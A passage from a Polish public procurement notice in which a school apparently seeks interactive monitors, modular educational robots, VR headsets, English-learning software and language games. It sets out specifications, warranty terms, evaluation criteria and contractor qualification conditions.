RAM: 8GB;<br/>19)	pamięć do przechowywania danych: 160 GB;<br/>20)	dwa procesory;<br/>21)	wbudowany system typu Android 13;<br/>22)	Funkcja Palm Rejection.<br/> <br/>Producent monitora interaktywnego powinien posiadać:<br/>1) certyfikat ISO 9001 systemu zarządzania jakością;<br/>2) certyfikat ISO 14001 zarządzania środowiskiem.<br/><br/>Monitor interaktywny powinien posiadać:<br/>1) instrukcję obsługi;<br/>2) deklarację zgodności UE i oznakowanie CE.<br/><br/>Gwarancja:<br/>Monitor interaktywny powinien być objęty co najmniej 3 letnim okresem gwarancji z serwisem producenta zlokalizowanym na terytorium Rzeczypospolitej Polskiej. W przypadku naprawy realizowanej poza miejscem użytkowania monitora interaktywnego wszelkie koszty związane z dostarczeniem monitora interaktywnego do serwisu i z powrotem do użytkownika powinny być pokryte przez gwaranta w ramach gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30231320-6 - Monitory dotykowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zatrudnienie osób bezrobotnych do 30 roku życia lub po ukończenia 50 roku życia posiadających status osób bezrobotnych lub zatrudnienia nie wcześniej niż 90 dni przed terminem składania ofert osób w wieku do 30 roku życia lub po ukończenia 50 roku życia, które wcześniej posiadały status osoby bezrobotnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Edukacyjny robot modułowy z zestawem kołowym<br/><br/>1. Edukacyjny robot modułowy z zestawem kołowym: 12 szt.<br/>Zestaw składający się z: <br/>1)	1 x uchwyt na telefon; <br/>2)	1 x moduł obrotowy;<br/>3)	1 x moduł stały;<br/>4)	1 x rolka obrotowa;<br/>5)	1 x adapter do akcesoriów;<br/>6)	1 x hub;<br/>7)	2 x koła obrotowe, <br/>8)	1 x pług;<br/>9)	1 x uchwyt na długopis; <br/>10)	1 x piłeczka piankowa;<br/>11)	1 x zestaw kabli.<br/><br/>Minimalne wymagania:<br/>1)	możliwość składania elementów w wielu konfiguracjach, w ciągu kilku minut, bez użycia narzędzi i na wiele sposobów, z możliwością tworzenia robotów: kroczących, społecznych, przemysłowych, wężowych itp.<br/>2)	hub: 6 kanałów bezprzewodowych;<br/>3)	wbudowana bateria litowa 3000 mAh;<br/>4)	sensory: <br/>a)	czujnik światła, <br/>b)	czujnik wykrywania koloru, <br/>b)	czujnik zbliżeniowy;<br/>5)	adapter do mocowania urządzeń kompatybilny z klockami Lego;<br/>6)	obsługiwane języki programowania: diagramatyczny / schematyczny, Python, blokowy i klasyczny język programowania;<br/>7)	aplikacja do programowania robota na Windows10, Android, IOS/Iphone;<br/>8)	możliwość współpracy z okularami VR;<br/>9)	biblioteka dodatkowych modułów do druku 3D;<br/>10)	scenariusze lekcji.<br/><br/>Edukacyjny robot modułowy z zestawem kołowym powinien być kompatybilny z edukacyjnym robotem modułowym z ramieniem. <br/><br/>Zestaw powinien posiadać:<br/>1)	podręcznik ze scenariuszami lekcji;<br/>2) deklarację zgodności UE i oznakowanie CE.<br/><br/>Gwarancja:<br/>Edukacyjny robot modułowy powinien być objęty co najmniej 2 letnim okresem gwarancji z serwisem producenta zlokalizowanym na terytorium Rzeczypospolitej Polskiej. W przypadku naprawy realizowanej poza miejscem użytkowania edukacyjnego robota modułowego wszelkie koszty związane z dostarczeniem edukacyjnego robota modułowego do serwisu i z powrotem do użytkownika powinny być pokryte przez gwaranta w ramach gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zatrudnienie osób bezrobotnych do 30 roku życia lub po ukończenia 50 roku życia posiadających status osób bezrobotnych lub zatrudnienia nie wcześniej niż 90 dni przed terminem składania ofert osób w wieku do 30 roku życia lub po ukończenia 50 roku życia, które wcześniej posiadały status osoby bezrobotnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Edukacyjny robot modułowy z ramieniem<br/><br/>1. Edukacyjny robot modułowy z ramieniem: 12 szt. <br/>Zestaw składający się z: <br/>1)	1 x uchwyt na telefon;<br/>2)	1 x moduł z baterią;<br/>3)	1 x moduł czteroosiowy;<br/>4)	2 x adapter do mocowania urządzeń;<br/>5)	1 x hub;<br/>6)	1 x ramię do rzucania;<br/>7)	1 x podstawka do robota;<br/>8)	1 x stojak na piłkę; <br/>9)	1 x piłeczka pingpogowa;<br/>10)	1 x uchwyt do piłeczki pingpongowej; <br/>11)	1 x labirynt z 2 stalowymi kulkami;<br/>12)	1 x zestaw kabli.<br/><br/>Minimalne wymagania:<br/>11)	możliwość składania elementów w wielu konfiguracjach, w ciągu kilku minut, bez użycia narzędzi i na wiele sposobów, z możliwością tworzenia robotów: kroczących, społecznych, przemysłowych, wężowych itp.<br/>12)	hub: 6 kanałów bezprzewodowych;<br/>13)	wbudowana bateria litowa 3000 mAh;<br/>14)	sensory: <br/>c)	czujnik wykrywania koloru, <br/>b)	czujnik zbliżeniowy;<br/>15)	adapter do mocowania urządzeń kompatybilny z klockami Lego;<br/>16)	obsługiwane języki programowania: diagramatyczny / schematyczny, Python, blokowy i klasyczny język programowania;<br/>17)	aplikacja do programowania robota na Windows10, Android, IOS/Iphone;<br/>18)	możliwość współpracy z okularami VR;<br/>19)	biblioteka dodatkowych modułów do druku 3D;<br/>20)	scenariusze lekcji.<br/><br/>Edukacyjny robot modułowy z ramieniem powinien być kompatybilny z edukacyjnym robotem modułowym z zestawem kołowym. <br/><br/>Zestaw powinien posiadać:<br/>1)	podręcznik ze scenariuszami lekcji;<br/>2) deklarację zgodności UE i oznakowanie CE.<br/><br/>Gwarancja:<br/>Edukacyjny robot modułowy powinien być objęty co najmniej 2 letnim okresem gwarancji z serwisem producenta zlokalizowanym na terytorium Rzeczypospolitej Polskiej. W przypadku naprawy realizowanej poza miejscem użytkowania edukacyjnego robota modułowego wszelkie koszty związane z dostarczeniem edukacyjnego robota modułowego do serwisu i z powrotem do użytkownika powinny być pokryte przez gwaranta w ramach gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162110-9 - Sprzęt dydaktyczny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zatrudnienie osób bezrobotnych do 30 roku życia lub po ukończenia 50 roku życia posiadających status osób bezrobotnych lub zatrudnienia nie wcześniej niż 90 dni przed terminem składania ofert osób w wieku do 30 roku życia lub po ukończenia 50 roku życia, które wcześniej posiadały status osoby bezrobotnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Okulary VR<br/><br/>1. Okulary VR- 4 szt.<br/>	Zestaw składający się z: <br/>-	4 szt. okularów VR; <br/>-	4 szt. kontrolerów ręcznych USB; <br/>-	1 szt. skrzyni transportowej.<br/><br/>Minimalne wymagania: <br/>1)	ośmiordzeniowy procesor Qualcomm Snapdragon; <br/>2)	wejście USB-C dla kontrolera ręcznego; <br/>3)	soczewka Fresnela/soczewka asferyczna 100 stopni FOV; <br/>4)	polimerowa bateria litowo-jonowa 4000 mAh;<br/>5)	przedni aparat 13 Mpx z autofokusem; <br/>6)	5,5-calowy wyświetlacz o rozdzielczości 2560 x 1440; <br/>7)	3 GB DDR RAM i 64 GB wewnętrznej pamięci masowej;<br/>8)	802.11 a/b/g/n Dual Band WiFi 2.4/5Ghz;<br/>9)	Bluetooth 4.2;<br/>10)	złącza: 1x audio; 1x USB-C 3.0;<br/>11)	zintegrowane podwójne głośniki;<br/>12)	wbudowany mikrofon;<br/>13)	mocowanie na głowę z regulacją w 3 kierunkach za pomocą podwójnych pasków z tyłu; <br/>14)	możliwość zakładania okularów na okulary korekcyjne;<br/>15)	oprogramowanie do przygotowywania, prowadzenia i monitorowania lekcji podczas korzystania z okularów VR;<br/>16)	dostęp do bezpłatnych treści edukacyjnych online;<br/>17)	ładowanie wszystkich 4 szt. okularów jednocześnie w skrzyni transportowej.<br/><br/>Zestaw powinien posiadać:<br/>1) instrukcję użytkownika;<br/>2) deklarację zgodności UE i oznakowanie CE. <br/><br/>Gwarancja:<br/>Zestaw powinien być objęty co najmniej 2 letnim okresem gwarancji z serwisem producenta zlokalizowanym na terytorium Rzeczypospolitej Polskiej. W przypadku naprawy realizowanej poza miejscem użytkowania zestawu wszelkie koszty związane z dostarczeniem zestawu do serwisu i z powrotem do użytkownika powinny być pokryte przez gwaranta w ramach gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zatrudnienie osób bezrobotnych do 30 roku życia lub po ukończenia 50 roku życia posiadających status osób bezrobotnych lub zatrudnienia nie wcześniej niż 90 dni przed terminem składania ofert osób w wieku do 30 roku życia lub po ukończenia 50 roku życia, które wcześniej posiadały status osoby bezrobotnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Oprogramowanie do nauki jęz. angielskiego<br/><br/>1. Oprogramowanie do nauki jęz. angielskiego- 4 szt.<br/>	Program do nauki podstaw jęz. angielskiego dla początkujących przeznaczony dla uczniów I i II etapu edukacyjnego. Program powinien zawierać ćwiczenia i sprawdzać wiadomości uczniów oraz umożliwiać drukowanie ćwiczeń i testów. Uzyskane przez uczniów wyniki powinny być zapisywane do pliku, zawierającego dane dotyczące daty i godziny rozwiązywania zadania, liczby poprawnych i błędnych odpowiedzi, a także oceny końcowe.<br/><br/>Zakres tematyczny: części zdania; rzeczowniki; zaimki; czasowniki; przyimki i spójniki; tworzenie pytań, odpowiedzi i negacji; określanie czasu; stopniowanie przymiotników; dyktanda.<br/><br/>Licencja nieograniczona czasowo na minimum 20 stanowisk komputerowych kompatybilna z wszystkimi rodzajami tablic interaktywnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zatrudnienie osób bezrobotnych do 30 roku życia lub po ukończenia 50 roku życia posiadających status osób bezrobotnych lub zatrudnienia nie wcześniej niż 90 dni przed terminem składania ofert osób w wieku do 30 roku życia lub po ukończenia 50 roku życia, które wcześniej posiadały status osoby bezrobotnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Gry i pomoce dydaktyczne do nauki jęz. angielskiego<br/><br/>1. Gra językowa „Bójka na słówka”- 24 szt.<br/>	Gra edukacyjna do nauki jęz. angielskiego przeznaczona dla uczniów I i II etapu edukacyjnego, od 2 do 8 graczy, polegająca na poszukiwaniu na kolorowych kartach wspólnych elementów- słówek i obrazków, występująca w 3 wariantach gry i na 2 poziomach: początkującym i zaawansowanym. Zakres językowy gry: 200 słów z 17 kategorii tematycznych: m. in. dom, kuchnia, czas wolny, transport, szkoła, miasto, uczucia, zwierzęta, części ciała; zwroty i wyrażenia.<br/><br/>W zestawie: karty z ilustracjami; słowniczek obrazkowy; instrukcja.<br/><br/>2. Gra językowa „Quiz Angielska przygoda”- 24 szt.	<br/>	Gra edukacyjna do nauki jęz. angielskiego przeznaczona dla uczniów I etapu edukacyjnego od 2 do 4 graczy, polegająca na zadawaniu pytań związanych z językiem angielskim, kulturą anglojęzyczną lub słownictwem, występująca w 2 wariantach gry. Zakres językowy gry: słownictwo z różnych kategorii tematycznych: przedmioty, zwierzęta, kształty, kolory, liczby.<br/><br/>W zestawie: plansza; dwustronne karty; pionki; kostka do gry; instrukcja. <br/><br/>3. Gra językowa „English words słówka angielskie&#34;- 24 szt.<br/>	Gra edukacyjna do nauki jęz. angielskiego przeznaczona dla uczniów I i II etapu edukacyjnego, od 2 do 8 graczy, polegająca na nauce słownictwa oraz przeprowadzaniu indywidualnych i grupowych zabaw językowych z możliwością samodzielnego sprawdzania poprawności odpowiedzi przez gracza dzięki kolorowemu paskowi, występująca w 3 wariantach gry. <br/><br/>W zestawie: tafelki z obrazkami i podpisami; instrukcja.<br/><br/>4. Gra językowa „The Story Maker&#34;- 24 szt.<br/>	Gra edukacyjna do nauki jęz. angielskiego przeznaczona dla uczniów I-III etapu edukacyjnego, polegająca na układaniu zdań i historyjek, występująca na 2 poziomach trudności: podstawowy i średnio zaawansowany (A2-B1) i w 6 wariantach gry. Zakres językowy: czasy gramatyczne, słownictwo z różnych kategorii tematycznych: m. in. ludzie, zwierzęta, miejsca, przedmioty, czynności. <br/><br/>W zestawie: karty z ilustracjami i słówkami; karty specjalne typu joker; kostka do gry z czasami gramatycznymi; kostka do gry wskazująca styl opowiadania; żetony; instrukcja w jęz. polskim z wprowadzeniem metodycznym oraz propozycjami zabaw i ćwiczeń edukacyjnych; instrukcja w jęz. angielskim.<br/><br/>5. Gra językowa „Let&#39;s talk! Projekt miasto&#34;- 24 szt.<br/>	Gra edukacyjna do nauki jęz. angielskiego przeznaczona dla uczniów I-III etapu edukacyjnego, od 2 do 4 graczy, polegająca na ćwiczeniu umiejętności swobodnej komunikacji oraz odgrywaniu scenek i przeprowadzaniu dialogów w codziennych sytuacjach, występująca w dwóch wariantach trudności. Zakres językowy gry: słownictwo związane z sytuacjami codziennymi z rówieśnikami (w mieście, szkole, parku, kinie i podczas zakupów).<br/><br/>W zestawie: plansza, kostka, pionki, karty, żetony.<br/> <br/>6. Kostki do konwersacji- 20 szt.<br/>	Pomoc dydaktyczna do nauki jęz. angielskiego przeznaczona dla uczniów I i II etapu edukacyjnego, wykorzystywana do rozwijania sprawność mówienia i ćwiczenia opowiadania.<br/><br/>W zestawie: kostki z pianki z pytaniami/zdaniami- 6 szt.; instrukcja w jęz. angielskim z ćwiczeniami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zatrudnienie osób bezrobotnych do 30 roku życia lub po ukończenia 50 roku życia posiadających status osób bezrobotnych lub zatrudnienia nie wcześniej niż 90 dni przed terminem składania ofert osób w wieku do 30 roku życia lub po ukończenia 50 roku życia, które wcześniej posiadały status osoby bezrobotnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	nie podlegają wykluczeniu na podstawie art. 108 ust. 1 pkt 1-6 ustawy Pzp:<br/>Brak podstaw do wykluczenia Zamawiający oceni na podstawie złożonego wraz z ofertą oświadczenia dotyczącego przesłanek wykluczenia z postępowania (wzór oświadczenia- załącznik nr 2 i 2A do SWZ)- dotyczy wszystkich części.<br/>Wykluczenie następuje w przypadkach wskazanych w art. 111 ustawy Pzp.<br/>2.	nie podlegają wykluczeniu na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp w stosunku do których otwarto likwidację, ogłoszono upadłość, których aktywami zarządza likwidator lub sąd, zawarli układ z wierzycielami, których działalność gospodarcza jest zawieszona albo znajdują się oni w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Brak podstaw do wykluczenia Zamawiający oceni na podstawie złożonego wraz z ofertą oświadczenia dotyczącego przesłanek wykluczenia z postępowania (wzór oświadczenia- załącznik nr 2 i 2A do SWZ) oraz dokumentów wymienionych w rozdziale VII ust. 6 pkt 1-3 - dotyczy wszystkich części.<br/>Wykluczenie następuje w przypadkach wskazanych w art. 111 ustawy Pzp.<br/>3.	spełniają warunki udziału w postępowaniu, dotyczące zdolności do występowania w obrocie gospodarczym - Zamawiający nie formułuje wymagań w tym zakresie;<br/>4.	spełniają warunki udziału w postępowaniu, dotyczące uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie formułuje wymagań w tym zakresie.<br/>Spełnianie przez Wykonawcę powyższego warunku Zamawiający oceni na podstawie złożonego wraz z ofertą oświadczenia dotyczącego spełniania warunków udziału w postępowaniu (wzór oświadczenia- załącznik nr 3 i 3A do SWZ) oraz dokumentów lub oświadczeń wymienionych w rozdziale VII ust. 6 pkt 2 SWZ.<br/>Powyższy warunek jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy (wzór oświadczenia- załącznik nr 8 do SWZ).<br/>5.	spełniają warunki udziału w postępowaniu, dotyczące sytuacji ekonomicznej lub finansowej- Zamawiający nie formułuje wymagań w tym zakresie;<br/>6.	spełniają warunki udziału w postępowaniu, dotyczące zdolności technicznej lub zawodowej - <br/>warunek ten będzie spełniony wówczas, gdy Wykonawca wykaże, że:<br/>wykonał lub wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, dostawy zbliżone zakresem do przedmiotu zamówienia i wartości nie mniejszej niż: część 1- 60.000,00 zł, część 2- 200.000,00 zł, część 3- 70.000,00 zł, część 4- 40.000,00 zł, część 5- 40.000,00 zł, część 6- 60.000,00 zł, część 7- 2.000,00 zł, część 8- 6.000,00 zł. <br/>Spełnianie przez Wykonawcę powyższego warunku zdolności technicznej lub zawodowej Zamawiający oceni na podstawie złożonego wraz z ofertą oświadczenia dotyczącego spełniania warunków udziału w postępowaniu (wzór oświadczenia- załącznik nr 3, 3A i 3B do SWZ) oraz dokumentów lub oświadczeń wymienionych w rozdziale VII ust. 6 pkt 1,2 i 3 SWZ.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do Oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy (wzór oświadczenia - załącznik nr 7 do SWZ). <br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunek ten należy spełnić łącznie.<br/>7.	nie podlegają wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 